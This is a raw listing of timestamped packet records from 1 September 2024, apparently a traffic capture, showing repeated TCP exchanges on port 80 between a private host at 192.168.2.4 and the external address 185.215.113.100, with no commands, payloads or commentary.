              Sep 1, 2024 23:03:06.087737083 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.087838888 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.087872982 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.087927103 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.449228048 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.449239969 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.449290037 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.531938076 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.531946898 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.532040119 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.638504982 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.638655901 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.638667107 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.638691902 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.638765097 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.638793945 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.638806105 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.638816118 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.638859034 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.638899088 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.638941050 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.639528036 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.639575958 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.721609116 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.721788883 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.852055073 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.852113008 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.852113962 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.852144957 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.852149010 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.852183104 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.852190018 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.852204084 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:06.852227926 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:06.852241039 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.050272942 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.050311089 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.050321102 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.050409079 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.050515890 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.050586939 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.050631046 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.050659895 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.050671101 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.050699949 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.134872913 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.134890079 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.135050058 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.135050058 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.241259098 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.241277933 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.241287947 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.241317034 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.241341114 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.241508007 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.241564035 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.241595984 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.241643906 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.241667986 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.241708994 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.241714954 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.241755009 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.642671108 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.642693996 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.642704964 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.642714977 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.642726898 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.642745018 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.642795086 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.642795086 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.642950058 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.642996073 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.643054008 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.643064976 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:07.643098116 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:07.643109083 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:08.457642078 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:08.457654953 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:08.457746983 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:08.649940014 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:08.650001049 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:08.650007010 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:08.650038004 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:08.735517979 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:08.735641956 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:08.735698938 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:09.313112020 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.313128948 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.313138962 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.313188076 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:09.313239098 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:09.526339054 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.526360989 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.526372910 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.526407957 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:09.526433945 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:09.716228962 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.716257095 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.716272116 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.716279030 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:09.716291904 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:09.716311932 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:09.923827887 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.923840046 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.923856020 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.923882008 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:09.923885107 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.923898935 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:09.923907995 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:09.923921108 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:09.924031973 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.007266045 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.007376909 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.007450104 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.136038065 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.136089087 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.136100054 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.136141062 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.136151075 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.136166096 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.136179924 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.136306047 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.339198112 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.339360952 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.339370966 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.339437008 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.339473963 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.339483976 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.339498997 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.339498997 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.339533091 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.339533091 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.539346933 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.539359093 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.539432049 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.539469004 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.539494991 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.539521933 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.539634943 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.539650917 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.539658070 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.539690018 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.539690018 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.539877892 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.539887905 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.541357994 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.740621090 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.740641117 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.740652084 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.740672112 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.740695953 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.740809917 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.740849972 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.740873098 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.740883112 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.740922928 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.741235971 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.741274118 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.741280079 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.741285086 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.741307020 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.741323948 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.949810982 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.949824095 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.949976921 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.949978113 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.950179100 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.950226068 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.950232983 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.950244904 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.950270891 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.950282097 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.950294018 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.950331926 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:10.950531960 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.950548887 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.950558901 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:10.950691938 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.163127899 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.163156986 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.163167000 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.163300037 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.163320065 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.163320065 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.163336992 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.163387060 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.163398981 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.163429022 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.163440943 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.163777113 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.163786888 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.163824081 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.364588022 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.364609957 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.364619970 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.364633083 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.364651918 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.364733934 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.364772081 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.364811897 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.364828110 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.364850044 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.364866972 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.364871025 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.364907026 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:11.447278976 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.447289944 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:11.447371960 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:12.402364969 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:12.402374029 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:12.402439117 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:12.861247063 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:12.861260891 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:12.861354113 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:12.944067955 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:12.944078922 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:12.944128990 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.069981098 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.069993973 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.070056915 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.070075035 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.070247889 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.070256948 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.070298910 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.070353031 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.070362091 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.070398092 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.152499914 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.152510881 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.152682066 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.264059067 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.264070988 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.264267921 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.264276028 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.264281034 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.264292955 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.264306068 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.264319897 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.264342070 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.264836073 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.264861107 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.264874935 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.264905930 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.265005112 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.265016079 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.265041113 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.265055895 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.346693993 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.346704006 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.346868992 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.470019102 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.470027924 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.470156908 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.470380068 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.470427990 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.470444918 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.470455885 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.470489025 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.470518112 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.470551014 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:13.553193092 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.553205967 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:13.553252935 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:14.280772924 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.280797958 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.280966043 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:14.475959063 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.476109028 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.476134062 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:14.476155043 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:14.558507919 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.558573961 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:14.558670044 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.558718920 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:14.669564962 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.669595003 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.669605970 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.669647932 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:14.669680119 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.669681072 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:14.669692993 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.669703960 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.669728041 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:14.669748068 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:14.752860069 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.752871990 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.752916098 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:14.869874001 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.869884968 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:14.870028973 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:15.136236906 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.136255980 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.136267900 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.136277914 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.136307955 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.136394024 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:15.136394978 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:15.136394978 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:15.136565924 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.136606932 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:15.338023901 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.338044882 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.338056087 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.338109016 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:15.338146925 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:15.754367113 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.754380941 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.754391909 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.754456043 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.754466057 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.754558086 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:15.754558086 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:15.754558086 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:15.963948965 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.963993073 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:15.964021921 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:15.964036942 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:16.051258087 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.051326036 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:16.051414013 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.051455021 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:16.158406019 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.158415079 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.158566952 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:16.158566952 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.158621073 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:16.158634901 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.158648014 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.158680916 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:16.625720024 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.625741005 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.625902891 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:16.625902891 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:16.835663080 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.835695028 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.835707903 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.835736036 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:16.835752010 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:16.835758924 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:16.835793018 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:17.034208059 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.034245014 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.034255028 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.034288883 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:17.034332037 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:17.234251022 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.234261036 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.234271049 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.234277010 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.234282017 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.234332085 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:17.234364986 CEST4973080192.168.2.4185.215.113.100
              Sep 1, 2024 23:03:17.442413092 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.442446947 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.442457914 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.442497969 CEST8049730185.215.113.100192.168.2.4
              Sep 1, 2024 23:03:17.442511082 CEST4973080192.168.2.4185.215.113.100
